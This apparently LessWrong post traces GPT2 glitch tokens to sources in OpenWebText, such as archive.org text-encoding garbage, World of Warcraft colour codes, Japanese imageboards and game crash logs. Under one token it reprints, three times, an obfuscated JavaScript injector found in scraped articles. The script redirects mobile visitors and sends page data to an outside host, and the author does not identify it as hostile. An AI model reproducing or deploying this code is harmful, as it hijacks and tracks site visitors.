It seems like if the SCP hypothesis is true, block characters should cause it to act strangely.
It does!
'What is \'████████\'?\n\nThis term comes from the Latin for "to know". It'
'What is \'████████\'?\n\n"████████" is a Latin for "I am not",'
Putting it in the middle of code causes it to sometimes spontaneously switch to an SCP story
' for i in █████.\n\n"I\'m not a scientist!"\n\n- Dr'
' for i in █████,\n\n[REDACTED]\n\n[REDACTED]\n\n[REDACTED] [REDACTED]\n\n[REDACTED]'
I laughed out loud at the SCP hypothesis. Love it. What a warped mirror the Shoggoths hold up to us, casting back unexpected pieces of our own behaviors in strange contexts.
Satisfying to see these glitch issues tracked down to their sources. Nice work.
This is a collection of every unidentified GPT2 glitch token listed in the third glitch token archaeology post. I was able to find the source of every single one, except for "?????-" and "?????-?????-"[1]. Please tell me if I missed one, or you've discovered one and don't understand where it came from. This isn't meant to be a well-written analysis, just a quick repository of my glitch-hunting observations.
I plan on writing up and categorizing all of these in greater detail in future posts. The first of which is here.
I used OpenWebText, a recreation of GPT2's training data, for all experiments in this post. I tokenized every .gz file in the archive and made a boolean Numpy array of each tokens that was present at least once. This allowed me to quickly identify infrequent tokens in the dataset and pull up the textual context with regular expressions. If there was an issue with overlap, I used a tokenizer-based extraction instead. All data/code available upon request.
The leftmost column is token id, the middle is the token string, and the right column is # of files the token was present in (out of 20610). GPT2 has 50256 total tokens.
GPT2 tokens with the lowest frequency in OpenWebText
Unfortunately, formatting issues are causing tokens 188-221 to display as corrupted or blank. They are \x00 to \x09, among other ASCII sequences. I'm not sure how often GPT2 actually saw these tokens.
Note how much overlap there is with the glitch tokens documented in the 3rd SolidGoldMagikarp investigation post! I've tested many of these low/null-frequency tokens, and most of them indeed behave as glitch tokens.
SolidGoldMagikarp III: Glitch token archaeology — LessWrong
Similarly, most documented glitch tokens also had low occurence in the dataset. I will remark upon the exceptions later.
Glitch Tokens and Where They Came From
48193 @#& 25
# of token of interest present in each file:
[3299, 4, 3, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
This was present in 25 files, of which 24 were 1-4 instances of profanity censors ("God f@#&ing damn"). The one exception contained >3000 instances.
ComputerCraft code
Other users helped me identify it as being part of a script for ComputerCraft, a Minecraft mod.
35496 ÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂÃÂ 26
[1184, 1127, 1126, 1041, 1035, 966, 825, 768, 518, 224, 128, 128, 96, 84, 68, 32, 30, 28, 22, 16, 8, 4, 4, 2, 2, 2] (sum=9468) (these are non-overlapping instances)
There are tokenization for repeating "ÃÂ" sequences of length 1, 2, 4, 8, 16, 32, and 64. Others pointed out that this was a common formating issue with online text. But why were sequences of length 64 so common as to get tokenized?
It's literally because of one website, archive.org.
It seems that archive.org has a few old comments that have massive chunks of such text. 600,000+ total A's, in fact, across dozens of pages. Although similar text exist on other sites, they were far fewer, and Archive.org was also the only example of length 16+ A tokens in the dataset, meaning it was likely the sole reason those tokens were ever present in the final tokenizer.
That said, I did see this post before my investigation, but guessed that something would have interrupted the sequence before it got to perfect sequences of thousands of letters. Obviously I was wrong.
In any case, ÃÂ sequences were rare enough that none (not even "ÃÂ"!) were included in the tokenizers for GPT3.5/GPT4 or GPT4o.
31727 cffff 156
This token was commonly found in World of Warcraft chat and auction scrapes. It, alongside "cffffcc" are also part of hex color codes. GPT2 almost always completes prompts with just "cffffcc" as "cffffcc00" followed by code. "cffffcc00" is hex for yellow, and apparently it's common as to color text for WoW notifications?
GPT2 completions from "cffffcc" as prompt
These turned out to be quite similar to chat and hotkey commands for Warcraft and DOTA, and also the exact type of stuff that would get scraped from Github. "cffffcc" was not present at all in OpenWebText, although "cffff" was part of various WoW chat log scrapes, where it was used to set text color.
(7131 '][' 20471) and (3693 '.[' 20604) and (42669 ').[' 19013) and (42924 '".[' 19219)
These were interesting as '.[' was the most commonly occuring glitch token (other than \x00, which is just ASCII for whitespace). It was in 20604/20610 files.
Most were part of references, and most of that was Wikipedia. The remainder was code, Javascript if I recall correctly.
Wikipedia Entries
31708 ーン 635
"ーン" is often part of transliterated English words. A common example was as part of "ブロックチェーン" (Burokku chēn), which is just the Japanese pronunciation of Blockchain. There was also some stuff about the Rothschilds.
Crypto spam
Prompting GPT2 with just "ーン" mostly results in very specifically Puzzles and Dragons content, referencing キン肉族超人予言書, 裏覚醒, and other common elements in the series. My best guess is that it's another member of the Dragon cluster (probably).
48396 ÛÛ 3
[494, 155, 494]
It's part of the description text on torrent sites for cracked video games . Whoever wrote this did not think highly of CODEX.
ÛÛ
24440 ュ 1338
"通常のプレビュ" (preview) is present on every post on 2ch, a popular Japanese imageboard.
Also, 天空龍ラッシュ! (Skydragon) is a location in P&D, so add another to the Dragon cluster.
39165 catentry 4
[194, 180, 73, 9]
It's a format for inventory management
39253 UCHIJ 5
[340, 262, 234, 36, 8]
Always part of the string "UCHIJAAAA", found in mod pack names as part of Minecraft crash logs.
UCHIJAAAA
47182 :""},{ 21 // 23785 "]=> 32 // 32047 "$:/ 3
// 47182 :""},{ 21
Parts of code.
21807 \\\\\\\\ 45
Long sequences of the above are common on bitcoinmagazine.com. There is also ASCII art.
\\\\\\\\
\\\\\\\\\\\\\\\'s time for some investigation. The results are somewhat counter-intuitive. That makes the wh", "y looked at on a day to day basis.Value changes are measured as relative or percentage changes. That\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s because only relative changes are comparable between different assets and over time. To gi", "ty tells us how much the BTC vs USD exchange rate disperses around the mean over a given period. Let\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s look at some more historical data to put the Bitcoin volatility into perspective.Thinking of historical Bitcoin volatility, it\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s no big news that it was going through the roof. Ho", "he Bitcoin volatility into perspective.Thinking of historical Bitcoin volatility, it\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s no big news that it was going through the roof. However, what does deserve attention is ho", 'ing 2013. Absolute changes in that time were massive. But looking at relative figures tells us, that\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s not the whole story
17629 practition 13
I took that to be a personal challenge! I did a more comprehensive writeup here.
That's " practition" with a space. It is not a tokenization of " practitioner" or " practitioners", since those have their own tokenizations. The examples in the dataset were mis-spellings, line breaks, and rare variants like "practitioning".
My go-to answer for such situations is that the tokenizer behavior was bugged or changed during training. But that doesn't work here, since we see the exact same pattern for the GPT4o tokenizer!
This one took me days to work out, but the results were illuminating.
It started when I found a similar pattern with a lot of low-frequency tokens that seem like parts of common words.
token examples
Others on LessWrong suggested that BPE, the process used to make the tokens in the first place, was responsible for this.
So it looks like ultra low-frequency tokens were culled, but the threshold was high enough that some survivors exhibit glitch behavior. This obviously solves itself with more data, so I would be extremely surprised if " practition" has glitch behavior in GPT4/GPT4o.
41441 \\- 645
Code element for... something.
Unknown Code
\n\nvar _0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\\x73\\x63\\x72\\x69\\x70\\x74″,”\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74″,”\\x73\\x72\\x63″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x33\\x63\\x58\\x66\\x71\\x6B\\x26\\x73\\x65\\x5F\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72\\x3D”,”\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72″,”\\x26\\x64\\x65\\x66\\x61\\x75\\x6C\\x74\\x5F\\x6B\\x65\\x79\\x77\\x6F\\x72\\x64\\x3D”,”\\x74\\x69\\x74\\x6C\\x65″,”\\x26″,”\\x3F”,”\\x72\\x65\\x70\\x6C\\x61\\x63\\x65″,”\\x73\\x65\\x61\\x72\\x63\\x68″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”,”\\x26\\x66\\x72\\x6D\\x3D\\x73\\x63\\x72\\x69\\x70\\x74″,”\\x63\\x75\\x72\\x72\\x65\\x6E\\x74\\x53\\x63\\x72\\x69\\x70\\x74″,”\\x69\\x6E\\x73\\x65\\x72\\x74\\x42\\x65\\x66\\x6F\\x72\\x65″,”\\x70\\x61\\x72\\x65\\x6E\\x74\\x4E\\x6F\\x64\\x65″,”\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64″,”\\x68\\x65\\x61\\x64″,”\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x42\\x79\\x54\\x61\\x67\\x4E\\x61\\x6D\\x65″,”\\x70\\x72\\x6F\\x74\\x6F\\x63\\x6F\\x6C”,”\\x68\\x74\\x74\\x70\\x73\\x3A”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x52\\x5F\\x50\\x41\\x54\\x48″,”\\x54\\x68\\x65\\x20\\x77\\x65\\x62\\x73\\x69\\x74\\x65\\x20\\x77\\x6F\\x72\\x6B\\x73\\x20\\x6F\\x6E\\x20\\x48\\x54\\x54\\x50\\x53\\x2E\\x20\\x54\\x68\\x65\\x20\\x74\\x72\\x61\\x63\\x6B\\x65\\x72\\x20\\x6D\\x75\\x73\\x74\\x20\\x75\\x73\\x65\\x20\\x48\\x54\\x54\\x50\\x53\\x20\\x74\\x6F\\x6F\\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}
This exact code was present in many different articles, often appearing in the middle of text. I don't know where to begin. Maybe it's something related to mobile devices?
31666 ?????-?????- 0
Zero appearances. "?????-" appeared 3 times as webpage Twitter integration embedding errors. Or maybe some other encoding issue?
The actual tweet was in Hindi.
I still have no idea what is going on here. Any help will be appreciated.
?????-
49781 EngineDebug 3
[239, 63, 1]
As part of UnityEngineDebugBin. The example below came from a Steam error log for Rimworld.
Unity is a common video game engine.
UnityEngineDebugBin
42470 TextColor 97
[215, 80, 74, 57, 22, 17, 15, 15, 11, 10, 10, 10, 10, 8, 8, 7, 6, 6, 6, 6, 6, 6, 5, 5, 4, 4, 4, 4, 4, 3]
Common code element. The biggest contributor was a cheat script for Paths of Exile.
Paths of Exile cheat script
43177 EStreamFrame 0 | 39906 EStream 0
GPT2 was very insistant that these were some sort of code. "EStream" in particular always continued as "EStreamControl".
Turns out it's part of a Python Steam library module called enums.
41383 assetsadobe 0
Always continues as "assetsadobe.com/is/image/content/dam/tnc/nature/en/photos".
A Google search showed that it's a common on nature.org.
Nature.org is probably also the source of the "natureconservancy" glitch token.
Non-English Languages
There is surprisingly little bi-lingual text for Russian and English in the dataset. Most Russian is just present as large chunks of entirely Russian text. Wikipedia text is occasionally bilingual, which means that ignoring the Russian portion likely increases accuracy for English token prediction.
Note that it isn't just "к" that is a glitch token. Other letters like "и" also have the same property. Russia is also generally rare in the training data - some Cyrillic characters are multi-token.
This is something that also applies to other languages, like Japanese. Also note that Chinese text was almost certainly intentionally excluded from the tokenizer training set - the full-size comma "," required 3 tokens, even though it is arguably the most common form of Chinese punctuation! This does not apply to punctuation also common in Japanese like "、" and "。", both being single-token. Although Wikipedia and some other sources will claim that Japanese also uses the full-size comma, it was extremely rare in the dataset.
Hypotheses
Why does this happen?
Firstly, my intuition about low-frequency tokens often being glitch tokens proved true - to a degree. It wasn't just raw frequency, but rather frequency in context. If a particular token doesn't provide extra information about following tokens, GPT2 will be trained to place less attention to them.
Take the following example:
At GPT2's level of capability, "天狗" (Tengu in Chinese/Japanese) doesn't provide extra information compared to "Tengu" or other english words around it. It learns (rightfully) to ignore Japanese text in the middle of English text. In fact, this means it should treat such tokens as null, not even blank space. All the attention vectors from the rest of the prompt should be shifted one token forwards, as though the glitch token never existed. This is the behavior we in fact observe!
Now consider the testing condition:
All the other tokens are pointing towards the location of "天狗", greatly increase its impact on subsequent token generated. At this point one of three things happens:
Let's take the glitch token set of "ÃÂÃÂ" and friends. They almost never convey information in any context. We would expect them to do only two things:
This is also the exact behavior we observe!
GPT2 generations
I would also go further and say that this is the default behavior for any token which either doesn't convey information in a particular context or doesn't appear in the training set at all. So much of the internet is something like:
